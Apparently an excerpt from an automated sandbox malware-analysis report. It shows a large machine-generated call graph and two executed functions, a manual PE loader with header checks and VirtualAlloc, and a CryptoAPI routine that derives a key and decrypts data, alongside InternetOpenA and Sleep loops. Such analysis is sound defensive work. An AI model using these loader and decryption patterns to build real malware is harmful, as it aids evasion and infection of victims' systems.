38296 405bd4 38291->38296 38796 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38292->38796 38302 405caa 38296->38302 38303 405bdc 38296->38303 38297 405b6c 38305 402200 25 API calls 38297->38305 38298->38290 38780 4037d0 38298->38780 38299 405a76 38307 402200 25 API calls 38299->38307 38300 405b0f 38308 402200 25 API calls 38300->38308 38301->38279 38809 406b10 39 API calls 2 library calls 38302->38809 38801 4067f0 39 API calls 2 library calls 38303->38801 38311 405b74 38305->38311 38312 405a7e 38307->38312 38313 405b17 38308->38313 38310 405caf 38322 4022d0 27 API calls 38310->38322 38797 4066f0 39 API calls 2 library calls 38311->38797 38316 402200 25 API calls 38312->38316 38792 4065e0 39 API calls 2 library calls 38313->38792 38314 405be1 38321 4022d0 27 API calls 38314->38321 38319 405a86 38316->38319 38318 405b79 38328 4022d0 27 API calls 38318->38328 38789 401710 CoUninitialize 38319->38789 38320 405b1c 38326 4022d0 27 API calls 38320->38326 38324 405bf1 38321->38324 38325 405cbf 38322->38325 38802 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38324->38802 38334 402200 25 API calls 38325->38334 38329 405b2c 38326->38329 38331 405b89 38328->38331 38793 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38329->38793 38330 405bfa 38333 402200 25 API calls 38330->38333 38798 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38331->38798 38337 405c02 38333->38337 38338 405cd3 38334->38338 38336 405b35 38340 402200 25 API calls 38336->38340 38803 406870 39 API calls 2 library calls 38337->38803 38342 405d94 38338->38342 38810 406b90 39 API calls 2 library calls 38338->38810 38339 405b92 38343 402200 25 API calls 38339->38343 38344 405b3d 38340->38344 38818 406eb0 39 API calls 2 library calls 38342->38818 38348 405b9a 38343->38348 38794 408440 27 API calls 38344->38794 38345 405c07 38353 4022d0 27 API calls 38345->38353 38799 408440 27 API calls 38348->38799 38350 405ce0 38357 4022d0 27 API calls 38350->38357 38351 405d9e 38354 4022d0 27 API calls 38351->38354 38356 405c17 38353->38356 38359 405dae 38354->38359 38804 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38356->38804 38358 405cf0 38357->38358 38811 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38358->38811 38369 402200 25 API calls 38359->38369 38360 406136 38700 407c30 38360->38700 38364 405c20 38367 402200 25 API calls 38364->38367 38365 405cf9 38368 402200 25 API calls 38365->38368 38366 40613f 38376 4022d0 27 API calls 38366->38376 38370 405c28 38367->38370 38372 405d01 38368->38372 38373 405dc2 38369->38373 38805 4068f0 39 API calls 2 library calls 38370->38805 38812 406c10 39 API calls 2 library calls 38372->38812 38596 405ea9 38373->38596 38819 406f30 39 API calls 2 library calls 38373->38819 38374 405c2d 38384 4022d0 27 API calls 38374->38384 38380 406152 38376->38380 38378 405d06 38387 4022d0 27 API calls 38378->38387 38710 407bb0 38380->38710 38381 405eb3 38388 4022d0 27 API calls 38381->38388 38382 405dcf 38390 4022d0 27 API calls 38382->38390 38386 405c3d 38384->38386 38385 40615d 38394 4022d0 27 API calls 38385->38394 38396 402200 25 API calls 38386->38396 38389 405d16 38387->38389 38391 405ec3 38388->38391 38813 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38389->38813 38393 405ddf 38390->38393 38406 402200 25 API calls 38391->38406 38820 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38393->38820 38395 406170 38394->38395 38720 407b10 38395->38720 38400 405c51 38396->38400 38397 405d1f 38401 402200 25 API calls 38397->38401 38404 405c72 38400->38404 38405 405c55 38400->38405 38407 405d27 38401->38407 38402 405de8 38408 402200 25 API calls 38402->38408 38403 40617b 38421 4022d0 27 API calls 38403->38421 38807 406a00 39 API calls 2 library calls 38404->38807 38806 406980 39 API calls 2 library calls 38405->38806 38412 405ed7 38406->38412 38814 406c90 39 API calls 2 library calls 38407->38814 38409 405df0 38408->38409 38821 406fb0 39 API calls 2 library calls 38409->38821 38418 405f59 38412->38418 38419 405edb 38412->38419 38414 405d2c 38427 4022d0 27 API calls 38414->38427 38416 405c77 38428 4022d0 27 API calls 38416->38428 38417 405c5a 38430 4022d0 27 API calls 38417->38430 38836 4074f0 39 API calls 2 library calls 38418->38836 38830 407360 39 API calls 2 library calls 38419->38830 38420 405df5 38432 4022d0 27 API calls 38420->38432 38424 40618e 38421->38424 38730 408560 38424->38730 38425 405f5e 38435 4022d0 27 API calls 38425->38435 38426 405ee0 38436 4022d0 27 API calls 38426->38436 38431 405d3c 38427->38431 38433 405c87 38428->38433 38615 405c6a 38430->38615 38446 402200 25 API calls 38431->38446 38437 405e05 38432->38437 38448 402200 25 API calls 38433->38448 38439 405f6e 38435->38439 38440 405ef0 38436->38440 38822 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38437->38822 38456 402200 25 API calls 38439->38456 38831 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38440->38831 38442 4061bb 38738 408670 38442->38738 38444 40611b 38450 402200 25 API calls 38444->38450 38452 405d50 38446->38452 38447 405e0e 38453 402200 25 API calls 38447->38453 38454 405c9b 38448->38454 38591 405b49 38450->38591 38451 405ef9 38457 402200 25 API calls 38451->38457 38458 405d54 38452->38458 38459 405d5e 38452->38459 38460 405e16 38453->38460 38454->38591 38808 406a90 39 API calls 2 library calls 38454->38808 38462 405f82 38456->38462 38463 405f01 38457->38463 38815 406d20 39 API calls 2 library calls 38458->38815 38816 406da0 39 API calls 2 library calls 38459->38816 38823 407030 39 API calls 2 library calls 38460->38823 38461 4085c0 27 API calls 38468 4061e8 38461->38468 38469 406004 38462->38469 38470 405f86 38462->38470 38832 4073e0 39 API calls 2 library calls 38463->38832 38474 408670 27 API calls 38468->38474 38843 407700 39 API calls 2 library calls 38469->38843 38837 407580 39 API calls 2 library calls 38470->38837 38472 405e1b 38484 4022d0 27 API calls 38472->38484 38473 405d63 38482 4022d0 27 API calls 38473->38482 38475 4061fd 38474->38475 38479 4085c0 27 API calls 38475->38479 38478 405f06 38488 4022d0 27 API calls 38478->38488 38483 406215 38479->38483 38480 406009 38491 4022d0 27 API calls 38480->38491 38481 405f8b 38492 4022d0 27 API calls 38481->38492 38486 405d73 38482->38486 38487 402200 25 API calls 38483->38487 38485 405e2b 38484->38485 38824 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38485->38824 38500 402200 25 API calls 38486->38500 38490 406223 38487->38490 38493 405f16 38488->38493 38495 402200 25 API calls 38490->38495 38496 406019 38491->38496 38497 405f9b 38492->38497 38833 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38493->38833 38494 405e34 38499 402200 25 API calls 38494->38499 38501 40622e 38495->38501 38513 402200 25 API calls 38496->38513 38838 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38497->38838 38505 405e3c 38499->38505 38506 405d87 38500->38506 38507 402200 25 API calls 38501->38507 38503 405f1f 38504 402200 25 API calls 38503->38504 38510 405f27 38504->38510 38825 4070b0 39 API calls 2 library calls 38505->38825 38506->38591 38817 406e30 39 API calls 2 library calls 38506->38817 38512 406239 38507->38512 38508 405fa4 38509 402200 25 API calls 38508->38509 38515 405fac 38509->38515 38834 407470 39 API calls 2 library calls 38510->38834 38519 402200 25 API calls 38512->38519 38514 40602d 38513->38514 38520 406031 38514->38520 38521 406084 38514->38521 38839 407600 39 API calls 2 library calls 38515->38839 38517 405e41 38530 4022d0 27 API calls 38517->38530 38524 406244 38519->38524 38844 407790 39 API calls 2 library calls 38520->38844 38849 407910 39 API calls 2 library calls 38521->38849 38523 405f2c 38533 4022d0 27 API calls 38523->38533 38528 402200 25 API calls 38524->38528 38526 405fb1 38536 4022d0 27 API calls 38526->38536 38532 40624f 38528->38532 38529 406036 38539 4022d0 27 API calls 38529->38539 38534 405e51 38530->38534 38531 406089 38542 4022d0 27 API calls 38531->38542 38535 402200 25 API calls 38532->38535 38537 405f3c 38533->38537 38548 402200 25 API calls 38534->38548 38538 40625a 38535->38538 38540 405fc1 38536->38540 38835 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38537->38835 38543 402200 25 API calls 38538->38543 38545 406046 38539->38545 38840 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38540->38840 38549 406099 38542->38549 38544 406265 38543->38544 38550 402200 25 API calls 38544->38550 38845 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38545->38845 38547 405f45 38553 402200 25 API calls 38547->38553 38554 405e65 38548->38554 38559 402200 25 API calls 38549->38559 38599 406274 38550->38599 38552 405fca 38556 402200 25 API calls 38552->38556 38553->38591 38557 405e6e 38554->38557 38826 407140 39 API calls 2 library calls 38554->38826 38555 40604f 38561 402200 25 API calls 38555->38561 38562 405fd2 38556->38562 38827 4071c0 39 API calls 2 library calls 38557->38827 38563 4060ad 38559->38563 38565 406057 38561->38565 38841 407680 39 API calls 2 library calls 38562->38841 38563->38591 38850 407990 39 API calls 2 library calls 38563->38850 38564 405e78 38570 4022d0 27 API calls 38564->38570 38846 407810 39 API calls 2 library calls 38565->38846 38568 405fd7 38571 4022d0 27 API calls 38568->38571 38574 405e88 38570->38574 38577 405fe7 38571->38577 38572 4060b6 38580 4022d0 27 API calls 38572->38580 38573 4062d9 Sleep 38573->38599 38585 402200 25 API calls 38574->38585 38575 40605c 38576 4022d0 27 API calls 38575->38576 38578 40606c 38576->38578 38842 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38577->38842 38847 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38578->38847 38583 4060c6 38580->38583 38582 405ff0 38587 402200 25 API calls 38582->38587 38851 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38583->38851 38584 4022d0 27 API calls 38584->38599 38589 405e9c 38585->38589 38586 406075 38590 402200 25 API calls 38586->38590 38587->38591 38589->38591 38828 407250 39 API calls 2 library calls 38589->38828 38593 40607d 38590->38593 38696 4016b0 38591->38696 38592 4060cf 38594 402200 25 API calls 38592->38594 38848 407890 39 API calls 2 library calls 38593->38848 38598 4060d7 38594->38598 38829 4072d0 39 API calls 2 library calls 38596->38829 38852 407a10 39 API calls 2 library calls 38598->38852 38599->38573 38599->38584 38600 4062e2 38599->38600 38605 4062d1 38599->38605 38601 402200 25 API calls 38600->38601 38603 4062ea 38601->38603 38741 408490 38603->38741 38604 4060dc 38610 4022d0 27 API calls 38604->38610 38607 402200 25 API calls 38605->38607 38607->38573 38608 4062fe 38611 408490 27 API calls 38608->38611 38609 406082 38612 4022d0 27 API calls 38609->38612 38613 4060ec 38610->38613 38614 406317 38611->38614 38612->38615 38853 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38613->38853 38617 408490 27 API calls 38614->38617 38855 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38615->38855 38621 40632a 38617->38621 38618 4060f5 38619 402200 25 API calls 38618->38619 38620 4060fd 38619->38620 38854 407a90 39 API calls 2 library calls 38620->38854 38623 408490 27 API calls 38621->38623 38625 406352 38621->38625 38623->38625 38856 407cc0 39 API calls 2 library calls 38625->38856 38626 40635f 38627 4022d0 27 API calls 38626->38627 38628 40636f 38627->38628 38629 402200 25 API calls 38628->38629 38630 406383 38629->38630 38631 406420 38630->38631 38632 4016b0 27 API calls 38630->38632 38859 407e30 39 API calls 2 library calls 38631->38859 38634 40639e 38632->38634 38857 407d50 39 API calls 2 library calls 38634->38857 38635 406425 38638 4022d0 27 API calls 38635->38638 38637 4063a7 38640 4022d0 27 API calls 38637->38640 38639 406438 38638->38639 38641 402200 25 API calls 38639->38641 38643 4063b7 38640->38643 38642 40644f 38641->38642 38667 4064af 38642->38667 38860 407fa0 39 API calls 2 library calls 38642->38860 38648 4063e7 38643->38648 38649 4063d8 Sleep 38643->38649 38645 4037d0 39 API calls 38647 4064c0 38645->38647 38646 406460 38652 4022d0 27 API calls 38646->38652 38653 4022d0 27 API calls 38648->38653 38649->38643 38650 4063e5 38649->38650 38651 406409 38650->38651 38654 402200 25 API calls 38651->38654 38655 40646f 38652->38655 38656 4063fe 38653->38656 38657 406411 38654->38657 38861 407f20 39 API calls 2 library calls 38655->38861 38659 402200 25 API calls 38656->38659 38858 401710 CoUninitialize 38657->38858 38659->38651 38661 406483 38662 4022d0 27 API calls 38661->38662 38663 406492 38662->38663 38862 407ec0 39 API calls __Init_thread_footer 38663->38862 38665 4064a0 38666 4022d0 27 API calls 38665->38666 38666->38667 38667->38645 38863 40f188 38668->38863 38670 40560f 38671 40f042 38670->38671 38874 4111fd GetLastError 38671->38874 38675 4064fc 38674->38675 38683 40652e 38674->38683 38912 409170 6 API calls 38675->38912 38677 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38679 406540 38677->38679 38678 406506 38678->38683 38913 409482 28 API calls 38678->38913 38679->38263 38681 406524 38914 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38681->38914 38683->38677 38685 4022f3 38684->38685 38685->38685 38686 402470 27 API calls 38685->38686 38687 402305 38686->38687 38687->38267 38689 40220b 38688->38689 38690 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38688->38690 38689->38690 38691 40c26f 25 API calls 38689->38691 38690->38271 38692 40224a 38691->38692 38693 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38692->38693 38694 40c26f 25 API calls 38692->38694 38693->38271 38695 4022cc 38694->38695 38697 4016c3 __cftof 38696->38697 38698 409035 27 API calls 38697->38698 38699 4016da __cftof 38698->38699 38699->38360 38701 407c62 38700->38701 38709 407c9e 38700->38709 38915 409170 6 API calls 38701->38915 38703 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38704 407cb0 38703->38704 38704->38366 38705 407c6c 38705->38709 38916 409482 28 API calls 38705->38916 38707 407c94 38917 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38707->38917 38709->38703 38711 407bdc 38710->38711 38719 407c0e 38710->38719 38918 409170 6 API calls 38711->38918 38712 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38715 407c20 38712->38715 38714 407be6 38714->38719 38919 409482 28 API calls 38714->38919 38715->38385 38717 407c04 38920 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38717->38920 38719->38712 38721 407b4d 38720->38721 38729 407b92 38720->38729 38921 409170 6 API calls 38721->38921 38722 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38725 407ba5 38722->38725 38724 407b57 38724->38729 38922 409482 28 API calls 38724->38922 38725->38403 38727 407b88 38923 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38727->38923 38729->38722 38731 408572 38730->38731 38732 408a60 27 API calls 38731->38732 38733 4061a3 38732->38733 38734 4085c0 38733->38734 38735 4085d9 38734->38735 38737 4085ed __InternalCxxFrameHandler 38735->38737 38924 402740 27 API calls 3 library calls 38735->38924 38737->38442 38925 408880 38738->38925 38740 4061d0 38740->38461 38742 4084bb 38741->38742 38743 4084c2 38742->38743 38744 408514 38742->38744 38745 4084f5 38742->38745 38743->38608 38753 408509 __InternalCxxFrameHandler 38744->38753 38947 401600 27 API calls 4 library calls 38744->38947 38746 40854a 38745->38746 38747 4084fc 38745->38747 38948 401600 27 API calls 3 library calls 38746->38948 38946 401600 27 API calls 4 library calls 38747->38946 38751 408502 38752 40c26f 25 API calls 38751->38752 38751->38753 38754 408554 38752->38754 38753->38608 38755->38283 38756->38283 38757->38283 38758->38283 38760 408ae8 38759->38760 38763 408a7a __InternalCxxFrameHandler 38759->38763 38949 408b10 27 API calls 3 library calls 38760->38949 38762 408afa 38762->38283 38763->38283 38765 401db2 38764->38765 38765->38765 38766 402470 27 API calls 38765->38766 38767 401dc5 38766->38767 38768 402470 27 API calls 38767->38768 38769 401e8d __InternalCxxFrameHandler 38768->38769 38950 40c34c 38769->38950 38772 401fc3 38773 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38772->38773 38775 402062 38772->38775 38774 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38773->38774 38776 402057 38774->38776 38777 40c26f 25 API calls 38775->38777 38776->38283 38778 402067 38777->38778 38779 401d60 39 API calls 38778->38779 38781 40f00b 23 API calls 38780->38781 38782 4037d7 38781->38782 38979 4082a0 27 API calls 3 library calls 38782->38979 38784 403844 38785 4038a1 38784->38785 38980 40f021 37 API calls _unexpected 38784->38980 38981 408740 27 API calls 3 library calls 38784->38981 38785->38290 38788->38299 38790->38282 38791->38300 38792->38320 38793->38336 38794->38591 38795->38285 38796->38297 38797->38318 38798->38339 38799->38591 38800->38276 38801->38314 38802->38330 38803->38345 38804->38364 38805->38374 38806->38417 38807->38416 38808->38417 38809->38310 38810->38350 38811->38365 38812->38378 38813->38397 38814->38414 38815->38417 38816->38473 38817->38342 38818->38351 38819->38382 38820->38402 38821->38420 38822->38447 38823->38472 38824->38494 38825->38517 38826->38557 38827->38564 38828->38596 38829->38381 38830->38426 38831->38451 38832->38478 38833->38503 38834->38523 38835->38547 38836->38425 38837->38481 38838->38508 38839->38526 38840->38552 38841->38568 38842->38582 38843->38480 38844->38529 38845->38555 38846->38575 38847->38586 38848->38609 38849->38531 38850->38572 38851->38592 38852->38604 38853->38618 38854->38609 38855->38444 38856->38626 38857->38637 38859->38635 38860->38646 38861->38661 38862->38665 38864 40f197 38863->38864 38865 40f1ac 38863->38865 38871 40c339 14 API calls __dosmaperr 38864->38871 38870 40f1a7 __alldvrm 38865->38870 38873 411df2 6 API calls __dosmaperr 38865->38873 38867 40f19c 38872 40c25f 25 API calls __cftof 38867->38872 38870->38670 38871->38867 38872->38870 38873->38870 38875 41121a 38874->38875 38876 411214 38874->38876 38880 411220 SetLastError 38875->38880 38905 411db0 6 API calls __dosmaperr 38875->38905 38904 411d71 6 API calls __dosmaperr 38876->38904 38879 411238 38879->38880 38881 41123c 38879->38881 38885 4112b4 38880->38885 38886 405618 Sleep 38880->38886 38906 411a65 14 API calls __dosmaperr 38881->38906 38884 411248 38887 411250 38884->38887 38888 411267 38884->38888 38911 40fad9 37 API calls __FrameHandler3::FrameUnwindToState 38885->38911 38886->38254 38907 411db0 6 API calls __dosmaperr 38887->38907 38908 411db0 6 API calls __dosmaperr 38888->38908 38893 411273 38894 411277 38893->38894 38895 411288 38893->38895 38909 411db0 6 API calls __dosmaperr 38894->38909 38910 41102b 14 API calls __dosmaperr 38895->38910 38896 411ac2 _free 14 API calls 38899 411264 38896->38899 38899->38880 38900 41125e 38900->38896 38901 411293 38902 411ac2 _free 14 API calls 38901->38902 38903 41129a 38902->38903 38903->38880 38904->38875 38905->38879 38906->38884 38907->38900 38908->38893 38909->38900 38910->38901 38912->38678 38913->38681 38914->38683 38915->38705 38916->38707 38917->38709 38918->38714 38919->38717 38920->38719 38921->38724 38922->38727 38923->38729 38924->38737 38926 4088c3 38925->38926 38927 408a50 38926->38927 38928 408990 38926->38928 38932 4088c8 __InternalCxxFrameHandler 38926->38932 38944 4016a0 27 API calls std::_Xinvalid_argument 38927->38944 38933 4089c5 38928->38933 38934 4089eb 38928->38934 38930 408a55 38945 401600 27 API calls 3 library calls 38930->38945 38932->38740 38933->38930 38936 4089d0 38933->38936 38941 4089dd __InternalCxxFrameHandler 38934->38941 38943 401600 27 API calls 4 library calls 38934->38943 38935 4089d6 38938 40c26f 25 API calls 38935->38938 38935->38941 38942 401600 27 API calls 4 library calls 38936->38942 38940 408a5f 38938->38940 38941->38740 38942->38935 38943->38941 38945->38935 38946->38751 38947->38753 38948->38751 38949->38762 38953 41144f 38950->38953 38954 411463 38953->38954 38958 4114a1 38954->38958 38959 411467 38954->38959 38970 401ed8 InternetOpenA 38954->38970 38956 411491 38973 40c25f 25 API calls __cftof 38956->38973 38974 40c369 37 API calls 2 library calls 38958->38974 38959->38970 38972 40c339 14 API calls __dosmaperr 38959->38972 38961 4114ad 38962 4114b7 38961->38962 38966 4114ce 38961->38966 38975 417a24 25 API calls 2 library calls 38962->38975 38964 411550 38964->38970 38976 40c339 14 API calls __dosmaperr 38964->38976 38965 4115a5 38965->38970 38978 40c339 14 API calls __dosmaperr 38965->38978 38966->38964 38966->38965 38969 411599 38977 40c25f 25 API calls __cftof 38969->38977 38970->38772 38972->38956 38973->38970 38974->38961 38975->38970 38976->38969 38977->38970 38978->38970 38979->38784 38980->38784 38981->38784 38983 40eeb7 38982->38983 38984 40eec9 38982->38984 39010 409906 GetModuleHandleW 38983->39010 38994 40ed50 38984->38994 38987 40eebc 38987->38984 39011 40ef4f GetModuleHandleExW 38987->39011 38989 4096cf 38989->38234 38993 40ef0c 38995 40ed5c __FrameHandler3::FrameUnwindToState 38994->38995 39017 40f28c RtlEnterCriticalSection 38995->39017 38997 40ed66 39018 40edbc 38997->39018 38999 40ed73 39022 40ed91 38999->39022 39002 40ef0d 39027 41366f GetPEB 39002->39027 39005 40ef3c 39008 40ef4f __FrameHandler3::FrameUnwindToState 3 API calls 39005->39008 39006 40ef1c GetPEB 39006->39005 39007 40ef2c GetCurrentProcess TerminateProcess 39006->39007 39007->39005 39009 40ef44 ExitProcess 39008->39009 39010->38987 39012 40ef91 39011->39012 39013 40ef6e GetProcAddress 39011->39013 39014 40eec8 39012->39014 39015 40ef97 FreeLibrary 39012->39015 39016 40ef83 39013->39016 39014->38984 39015->39014 39016->39012 39017->38997 39020 40edc8 __FrameHandler3::FrameUnwindToState 39018->39020 39019 40ee29 __FrameHandler3::FrameUnwindToState 39019->38999 39020->39019 39025 410940 14 API calls __FrameHandler3::FrameUnwindToState 39020->39025 39026 40f2d4 RtlLeaveCriticalSection 39022->39026 39024 40ed7f 39024->38989 39024->39002 39025->39019 39026->39024 39028 413689 39027->39028 39030 40ef17 39027->39030 39031 411c94 5 API calls __dosmaperr 39028->39031 39030->39005 39030->39006 39031->39030

                                                      Executed Functions

                                                      Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 4 402cf1-402cff 2->4 5 402cc6 2->5 8 402d01-402d28 SetLastError call 402920 call 408ec2 4->8 9 402d29-402d36 4->9 7 402ccb-402cf0 call 402920 SetLastError call 408ec2 5->7 11 402d38-402d3d 9->11 12 402d3f-402d48 9->12 11->7 16 402d54-402d5a 12->16 17 402d4a-402d4f 12->17 21 402d66-402d73 16->21 22 402d5c-402d61 16->22 17->7 25 402d94-402db7 GetNativeSystemInfo 21->25 26 402d75 21->26 22->7 29 402dc3-402ddb VirtualAlloc 25->29 30 402db9-402dbe 25->30 28 402d77-402d92 26->28 28->25 28->28 31 402e03-402e1e GetProcessHeap HeapAlloc 29->31 32 402ddd-402ded VirtualAlloc 29->32 30->7 33 402e20-402e2d VirtualFree 31->33 34 402e34-402e7a 31->34 32->31 35 402def-402dfc call 402920 32->35 33->34 37 402e7c-402e7e SetLastError 34->37 38 402e9e-402ee6 VirtualAlloc call 40a3e0 34->38 35->31 40 402e84-402e9d call 4033d0 call 408ec2 37->40 44 402eec-402eef 38->44 45 402f9f-402fa8 38->45 47 402ef0-402ef5 44->47 48 40302d 45->48 49 402fae-402fb5 45->49 52 402ef7-402f03 47->52 53 402f38-402f40 47->53 51 403032-40303e call 402a80 48->51 54 402fb7-402fb9 49->54 55 402fbb-402fcd 49->55 51->40 65 403044-403067 51->65 58 402f84-402f96 52->58 59 402f05-402f1f 52->59 53->37 61 402f46-402f59 call 402bf0 53->61 54->51 55->48 60 402fcf 55->60 58->47 63 402f9c 58->63 59->40 72 402f25-402f36 call 40aa10 59->72 64 402fd0-402fe5 60->64 69 402f5b-402f60 61->69 63->45 67 402fe7-402fea 64->67 68 40301e-403028 64->68 70 403069-40306e 65->70 71 40307c-40309c 65->71 73 402ff0-403001 67->73 68->64 75 40302a 68->75 69->40 74 402f66-402f7b call 40a3e0 69->74 76 403070-403073 70->76 77 403075-403077 70->77 79 4030a2-4030a8 71->79 80 403165-403171 call 402950 71->80 89 402f7e-402f81 72->89 81 403003-40300b 73->81 82 40300e-40301c 73->82 74->89 75->48 76->71 77->71 84 403079 77->84 86 4030b0-4030c9 79->86 92 403176-403178 80->92 81->82 82->68 82->73 84->71 90 4030e3-4030e6 86->90 91 4030cb-4030ce 86->91 89->58 93 403123-40312f 90->93 94 4030e8-4030ef 90->94 95 4030d0-4030d3 91->95 96 4030d5-4030d8 91->96 92->40 97 40317e-40318a 92->97 100 403131 93->100 101 403137-403140 93->101 98 403120 94->98 99 4030f1-4030f6 call 402950 94->99 102 4030dd-4030e0 95->102 96->90 103 4030da 96->103 104 4031b3-4031b8 97->104 105 40318c-403195 97->105 98->93 112 4030fb-4030fd 99->112 100->101 110 403143-40315f 101->110 102->90 103->102 108 40320a-403223 call 408ec2 104->108 109 4031ba-4031c3 104->109 105->104 106 403197-40319b 105->106 106->104 111 40319d 106->111 114 4031f4-403209 call 408ec2 109->114 115 4031c5-4031ce 109->115 110->80 110->86 117 4031a0-4031af 111->117 112->40 118 403103-40311e 112->118 123 4031d0 115->123 124 4031da-4031f3 call 408ec2 115->124 125 4031b1 117->125 118->110 123->124 125->104
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                      • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                      Strings
                                                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                      • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                      • Section alignment invalid!, xrefs: 00402D5C
                                                      • DOS header size is not valid!, xrefs: 00402D09
                                                      • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                      • Size is not valid!, xrefs: 00402C9C
                                                      • @, xrefs: 00402C8F
                                                      • DOS header is not valid!, xrefs: 00402CC6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                      • API String ID: 1452528299-393758929
                                                      • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                      • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                      • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                      • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98
                                                      Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 855 4034c0-403548 CryptAcquireContextW 856 40360a-403620 GetLastError CryptReleaseContext 855->856 857 40354e-40356c CryptCreateHash 855->857 858 403754-40375a 856->858 857->856 859 403572-403585 857->859 860 403784-4037a1 call 408ec2 858->860 861 40375c-403768 858->861 862 403588-40358d 859->862 863 40377a-403781 call 409027 861->863 864 40376a-403778 861->864 862->862 865 40358f-4035d6 call 409035 call 40e46b CryptHashData 862->865 863->860 864->863 867 4037a2-4037b5 call 40c26f 864->867 879 4035e6-403608 CryptDeriveKey 865->879 880 4035d8-4035e1 GetLastError 865->880 877 4037b7-4037be 867->877 878 4037c8 867->878 877->878 884 4037c0-4037c4 877->884 879->856 881 403625-403626 call 40e2bd 879->881 880->858 885 40362b-403677 call 40a3e0 call 409035 881->885 884->878 890 403748-40374e CryptDestroyKey 885->890 891 40367d-40368c 885->891 890->858 892 403692-40369b 891->892 893 4036a9-4036e4 call 40a3e0 CryptDecrypt 892->893 894 40369d-40369f 892->894 893->890 897 4036e6-403711 call 40a3e0 893->897 894->893 897->890 900 403713-403742 897->900 900->890 900->892
                                                      APIs
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,86411EA2), ref: 00403540
                                                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                      • _mbstowcs.LIBCMT ref: 004035B7
                                                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                      • GetLastError.KERNEL32 ref: 004035D8
                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                      • GetLastError.KERNEL32 ref: 0040360A
